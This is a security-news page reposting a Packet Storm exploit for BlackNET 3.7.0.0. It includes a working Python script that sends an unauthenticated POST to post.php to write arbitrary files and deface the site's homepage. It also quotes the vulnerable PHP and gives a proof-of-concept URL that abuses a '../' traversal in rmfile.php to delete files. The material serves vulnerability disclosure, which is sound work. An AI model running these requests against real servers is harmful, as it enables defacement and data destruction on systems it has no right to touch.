Security
Headlines
HeadlinesLatestCVEs

Headline

BlackNET 3.7.0.0 Missing Authentication / File Deletion / Traversal

BlackNET version 3.7.0.0 appears to allow unauthenticated access to modify data and suffers from arbitrary file deletion and directory traversal vulnerabilities while authenticated.

Packet Storm
#csrf#vulnerability#mac#git#php#auth
# Exploit Title: BlackNET - Multiple Vulnerabilities# Exploit Author: bRpsd# Date: 20/09/2024# Vendor Homepage: https://github.com/AndroVirus# Software Link: https://github.com/AndroVirus/BlackNET/# Version: v3.7.0.0# Tested on: MacOS - Xampp# CVE: NAimport requests# Define the target URL for the POST requestpost_url = "http://localhost/x/BlackNET/BlackNET%20Panel/post.php"# Defaces the homepagepayload = "Nothing to see here."data = {    'folder_name': 'www',  # this can create any folder on the server    'file_name': 'index.html',  # Name of the file to be created    'data': payload  # The payload being tested}# Send the POST requestresponse = requests.post(post_url, data=data)# Check the responseif response.status_code == 200:    print("Request successful. Check if 'file' was created.")else:    print(f"Request failed with status code: {response.status_code}")    # Vulnerable code: /BlackNET/BlackNET%20Panel/post.php# header('Content-type: text/html; charset=utf-8');## require_once 'config/config.php';# require_once APP_PATH . 'classes/POST.php';## if ($_SERVER['REQUEST_METHOD'] == "POST") {#  $POST = new BlackNET\POST();# $folder_name = isset($_POST['folder_name']) && $_POST['folder_name'] != "" ? $_POST['folder_name'] : 'www';#    $file_name = isset($_POST['file_name']) ? $_POST['file_name'] : "unknown.txt";##   $data = $POST->sanitize($_POST['data']);##  $POST->prepare($folder_name, $file_name, $data);## $POST->write();   ############################################################################################# Arbitrary File Deletion & Directory Traversal [Authenticated]# File: rmfile.php# Parameter: fname# Vul Code:#<?php# require_once 'session.php';#$msg = "";#$id = "";#if ($_SERVER['REQUEST_METHOD'] == "POST") {#    $files = $_POST['file'];#    $vicid = $utils->sanitize($_POST['vicid']);#    if ($auth->checkToken($_POST['csrf'], $_SESSION['csrf'])) {#        foreach ($files as $file) {#if (strpos($file, "../")) {#                $id = $vicid;#                $msg = "error";#            }#            $filename = $utils->sanitize($file);#            $real_path = realpath("upload" . "/" . $vicid . "/" . $filename);#            if (file_exists($real_path)) {#                unlink($real_path);### Proof Of Concept:# http://localhost/x/BlackNET/BlackNET%20Panel/rmfile.php?fname=../favico.png&vicid=&csrf=95a6ae14d491e482b4370da1fd74f69891058f12472e6510e373889d99d84c3c

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution